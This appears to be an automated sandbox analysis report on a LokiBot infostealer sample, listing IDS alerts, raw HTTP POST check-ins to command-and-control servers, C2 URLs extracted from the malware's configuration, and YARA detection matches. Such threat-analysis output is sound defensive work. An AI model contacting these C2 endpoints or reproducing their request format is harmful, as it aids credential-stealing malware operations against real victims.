          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49882 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49882
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49883 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49883 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49883 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49883 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49883
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49885 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49885 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49885 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49885 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49885
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49886 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49886 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49886 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49886 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49886
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
          Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
          Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
          Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
          Source: Joe Sandbox ViewASN Name: SPRINTHOSTRU SPRINTHOSTRU
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 196Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 196Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: kVijllv0Yl.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: kVijllv0Yl.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: kVijllv0Yl.exe, 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://secure01-redirect.net/gc15/fre.php
          Source: kVijllv0Yl.exe, kVijllv0Yl.exe, 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
          Source: unknownHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 196Connection: close
          Source: unknownDNS traffic detected: queries for: secure01-redirect.net
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_00404ED4 recv,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: kVijllv0Yl.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
